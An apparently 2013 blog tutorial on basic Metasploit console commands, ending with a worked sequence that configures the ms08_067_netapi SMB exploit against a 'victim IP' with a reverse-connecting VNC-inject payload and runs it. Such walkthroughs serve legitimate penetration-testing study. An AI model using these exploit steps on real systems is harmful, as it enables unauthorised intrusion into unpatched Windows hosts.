Metasploit Basic Command Tutorial

    Metasploit Basic Command Tutorial

     Hello Friends,
    Metasploit is the database of all exploits and a software that contain information about different exploits so here is the basic usage of metasploit, I am using backtrack 5  machine for this tutorial however if you are using other Linux distribution or windows OS than it is fine but the requirement is Metasploit.
                                This is a simple tutorial by me .If you wanna learn more  about metasploit go to Wikipedia.

                                                                                                                                                                 Msfconsole

    Msfconsole is a console or a command windows of metasploit that will give you the full support of internal and external metasploit commands, there was a web interface of metasploit but now we don't have that option.
    So on your terminal type msfconsole to start metasploit console.
                                                              root@bt:~# msfconsole     

    Metasploit is also available on GUI (graphical user interface), if you want to run metasploit GUI than on the terminal type.
                                                              root@bt:~# msfgui               
       
    Help command of metasploit will give you the basic idea about the usage of metasploit, if you are looking for msfconsole help than from the root windows type.
                                                            root@bt:~# msfconsole -h   
    For msfconsole usage you need to be on msfconsole window to get the help.
                                                                    msf > help                   
    Connect command is nothing but the alternate of telnet and ncat in metasploit, use connect command to connect with the remote and local host on metasploit you can define the IP of the host machine.
                                                     msf > connect -s www.metasploit.com 443  
                                                    [*] Connected to www.metasploit.com:443  
                                                    GET / HTTP/1.0                                            
    -s → SSL
    Ping command of msfconsole is to check the alive host and so on.
                                                         msf > ping 192.168.1.45         
    Show exploits is a command to check all the available exploits on metasploit.
                                                           msf > show exploits                 
    Show payloads just like show exploits, show payloads will show you all the available payloads on metasploit.
                                                         msf > show payloads            
    Info command will give you more information about any exploits and payloads.
                                                        msf>info <exploit>                
                                                        msf>info <payload>
                 
    Use command will give metasploit an instruction to use a exploit or payload.
                                                msf > use exploit/windows/smb/ms08_067_netapi    
                                                msf exploit(ms08_067_netapi) >                                

    msf exploit(ms08_067_netapi) > show options To show available options
    msf exploit(ms08_067_netapi) > set rhost 119.67.45.2 → To set remote IP (victim IP)
    msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP)
    msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host
    msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host
    msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → Tp set payload

    msf exploit(ms08_067_netapi) > unset rhost → To remove rhost
    msf exploit(ms08_067_netapi) > unset lhost → To remove local host
    msf exploit(ms08_067_netapi) > exploit → To execute exploit
    msf exploit(ms08_067_netapi) > back → To go back on the main window
    msf exploit(ms08_067_netapi) > sessions -l → To check any active session
    msf exploit(ms08_067_netapi) > sessions -i ID → To go on a active session ID must be numeric number

    Source URL: http://ampledreams.blogspot.com/2013/12/metasploit-basic-command-tutorial.html
    Visit ampledreams for Daily Updated Cars Collection

My Blog List

Popular Posts

Blog Archive